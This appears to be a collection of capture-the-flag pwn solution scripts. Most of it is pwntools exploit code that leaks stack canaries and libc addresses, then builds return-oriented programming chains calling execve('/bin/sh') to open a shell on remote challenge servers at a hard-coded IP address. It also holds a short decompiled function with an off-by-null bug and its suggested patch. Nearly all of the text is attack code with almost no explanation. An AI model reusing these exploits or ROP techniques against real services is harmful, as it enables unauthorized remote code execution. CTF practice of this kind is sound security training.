D | 杀猪盘
#-*- coding:utf-8-*-
from pwn import *
#from LibcSearcher import *
context(os="linux", arch="amd64", log_level="debug")
local = 0
if local:
p = process('./szp2')#,env={'LD_PRELOAD':'./libc.so.6'})
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
p = remote('39.106.48.123', 22015)
# libc = ELF("libc.so.6")
# nc 39.106.48.123 24920
elf = ELF("szp2")
o_g = [0x45226,0x4527a,0xf0364,0xf1207]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
ac = lambda a="" : gdb.attach(p, a) if local else None
# shellcode = asm(shellcraft.sh(),arch='amd64', os='linux')
def role_3():
sla(": ", '3')
sla("(Y/n)", 'Y')
sla('。', '\n'*3)
sla("> ", 1)
sla(":", 'aaaa')
sla("¥", '-')
ru("¥")
addr = int(ru('\n'),10)
sla("¥", '123')
sl('\n')
sla("> ", '4')
sla("¥", '123')
sla('。', '\n'*3)
return addr
def role_4(msg1):
sla("请选择: ", '4')
sla("(Y/n)", 'Y')
sla('。', '\n'*13)
sla("> ", 2)
sl('\n'*10)
sla("> ", 1)
sla(":", 'qwer')
sla("¥", '1234')
sla("¥", '123')
sl('\n')
sla("> ", '4')
sla("¥", '1')
sl('\n'*2)
sla(":", msg1)
ru("aaaaaaaaaaaaaaaaaaaa\n")
cannry = u64(p.recv(7).rjust(8, '\x00'))
return cannry
sla("> ", 2)
base = role_3()-0xa29a
lg('base', base)
sl('\n\n')
system = base + 0x1ea20
binsh = base + 0xc2d1b
pop_rdi = base + 0x0000000000009cc2#0x000000000000cf9b
syscall = base+0x0000000000009673
pop_rax = base+0x0000000000064d97
pop_rsi = base+0x0000000000018c9e
pop_rdx = base+0x0000000000009bcf
cannry = role_4('a'*152)
lg("cannry", cannry)
lg('system', system)
lg('binsh', binsh)
lg('base', base)
sl('\n')
from struct import pack
#payload = 'B'*152+p64(cannry)+p64(0xdeadbeef)+p64(pop_rdi)+p64(binsh)+p64(0xdeadbeef)+p64(system)
#payload = 'b'*152 + p64(cannry)*2 + p64(pop_rdi) + p64(binsh) + p64(system)
payload = 'b'*152 + p64(cannry)*2 + p64(pop_rax) + p64(0x3b) + p64(pop_rdi) + p64(binsh)
payload += p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(syscall)
print(len(payload))
# gdb.attach(p)
#gdb.attach(p)
# payload = 'bbbbbbbbbbbbbb'
sla(":", payload)
# sla(":", msg2)
sla('。', '\n')
p.interactive()
D | 猜数字
from pwn import *
txt = "39.106.48.123:23587"
host, port = txt.split(':')
s = remote("39.106.48.123", 23587)
context(log_level='debug', arch='amd64', os='linux')
def get_num():
rd = 128
cur = 256 + rd
def getrd(rd):
return rd // 2 or 1
print('123')
# ni = s.recvuntil('guess:')
ni = s.recvrepeat(1)
print(ni)
s.sendline(str(cur).encode())
print('12344')
while 1:
recv = s.recvregex(r'small|large|message')
rd = getrd(rd)
print(recv, cur, rd)
if b'too large:' in recv:
cur = cur - rd
elif b'too small' in recv:
cur = cur + rd
elif b'leave a' in recv:
print(cur, 'success')
# pause()
return
s.sendline(str(cur).encode())
# pause()
print('----')
get_num()
# ogg = 0x45226
# payload = flat(b'a' * (0x70), ogg)
# gdb.attach(s)
elf = ELF('./pwn1')
pop_rdi = ROP(elf).find_gadget(['pop rdi', 'ret'])[0]
main = 0x00401265
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
payload = flat(b'a' * (0x70 + 8), pop_rdi, puts_got, puts_plt, main)
s.send(payload)
puts_addr = s.recvuntil(b'\x7f')[-6:]
puts_addr = unpack(puts_addr.ljust(8, b'\x00')) # 地址是6bytes, 补到8位unpack
success('puts_addr' + hex(puts_addr))
# pause()
print(s.recvrepeat(1))
get_num()
ogg = 0xf1247
ogg = 0x10a41c
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("libc.so.6")
libc.address = puts_addr - libc.sym["puts"]
success('libc:' + hex(libc.address))
# system = libc.sym["system"]
# bin_sh = next(libc.search(b"/bin/sh"))
pl = libc.address + ogg
success('pl:' + hex(pl))
payload = flat(b'a' * (0x70 + 8), pl)
s.sendline(payload)
s.interactive()
vaccine
mini_redis
mvm
nullnull
防御
__int64 __fastcall edit_read(_BYTE *a1, int a2) {
int v2; // eax
unsigned int v6; // [rsp+18h] [rbp-8h]
while (1) {
v2 = a2--;
if (v2 < 0) // -- ==0时可读,多读了1个字节
break;
v6 = read(0, a1, 1uLL);
if (!v6)
break;
if (v6 == -1) {
if ((unsigned int) __errno_location() != 11 && (unsigned int) __errno_location() != 4)
return 0xFFFFFFFFLL;
} else {
if (*a1 == 10) {
*a1 = 0; // -- 最后字符为\n时造成offbynull, 修复这里nop掉
return v6;
}
++a1;
}
}
return v6;
}
outout
D | 栈溢出 | shaokao
from pwn import *
s = process('./shaokao')
context(log_level='debug', arch='amd64', os='linux')
s.sendline('1')
s.sendline('1')
s.sendline('-100000')
s.sendline('3')
s.sendline('4')
s.sendline('5')
s.recv()
# ROPgadget --ropchain --binary ./shaokao
from struct import pack
p = b'a' * (0x20 + 8)
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402404) # syscall
s.sendline(p)
s.interactive()
